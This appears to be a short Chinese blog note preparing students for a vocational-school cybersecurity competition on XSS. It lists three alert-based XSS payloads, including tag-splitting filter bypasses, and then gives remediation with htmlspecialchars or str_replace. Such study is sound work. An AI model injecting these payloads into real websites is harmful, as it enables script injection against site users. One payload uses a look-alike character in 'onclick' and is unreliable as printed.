全国职业院校技能大赛中职组网络安全竞赛试题 —XSS漏洞(笔记文档)
全国职业院校技能大赛中职组网络安全竞赛试题 —
XSS漏洞(笔记文档)
中职网安 XSS漏洞笔记
一、XSS漏洞
1.过滤不严时直接提交script语句,如<script>alert(123)</script>
2.过滤稍严时用<br>标签绕过waf,如<scr<br>ipt>ale<br>rt(123)</sc<br>ript>
3.过滤严格时把结束标签的斜杠过滤了,即可用没结束标签的元素来构造xss,如<img src=1 οnclick='javascript:alert(123);'>
4.修复方案:
在输入时使用htmlspecialchars把预定义的字符转换为 HTML 实体。
或者用str_replace函数把关键字替换掉
有问题可以私信博主哈~~~~~
觉得有对你有帮助话给个一键三连(您的鼓励是我的动力)
祝大家身体健康万事如意!!!